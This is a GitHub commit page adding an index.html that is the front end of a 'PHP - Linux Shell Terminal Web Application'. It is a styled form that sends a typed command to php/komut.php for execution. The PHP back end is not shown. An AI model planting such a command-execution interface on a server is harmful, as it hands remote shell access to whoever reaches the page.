Skip to content

Commit 4050c8e

Browse files
author
İSMAİL TAŞDELEN
committed
Add files via upload
1 parent e66b06c commit 4050c8e

File tree

1 file changed

+41
-0
lines changed

1 file changed

+41
-0
lines changed

index.html

Lines changed: 41 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,41 @@
1+
<head>
2+
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
3+
<style>
4+
.textbox {
5+
border:2px solid #456879;
6+
border-radius:10px;
7+
height: 22px;
8+
width: 230px;
9+
}
10+
.button {
11+
background-color: #4CAF50;
12+
border: none;
13+
color: white;
14+
padding: 16px 32px;
15+
text-align: center;
16+
text-decoration: none;
17+
display: inline-block;
18+
font-size: 16px;
19+
margin: 4px 2px;
20+
-webkit-transition-duration: 0.4s;
21+
transition-duration: 0.4s;
22+
cursor: pointer;
23+
}
24+
.button1:hover {
25+
background-color: #4CAF50;
26+
color: white;
27+
}
28+
</style>
29+
</head>
30+
<div style="background-color:black; color:white; padding:20px;">
31+
<h4> <center> PHP - Linux Shell Terminal Web Application - GH0ST-S0FTWARE <center> </h4>
32+
</div>
33+
<form method="get" action="php/komut.php">
34+
<table align="center">
35+
<tr>
36+
<td>Komut : </td>
37+
<td><input type="text" name="komut"class="textbox" /></td>
38+
<td colspan="2"><input type="submit" value="Çalıştır" class="button1" /></td>
39+
</tr>
40+
</table>
41+
</form>

0 commit comments

Comments
 (0)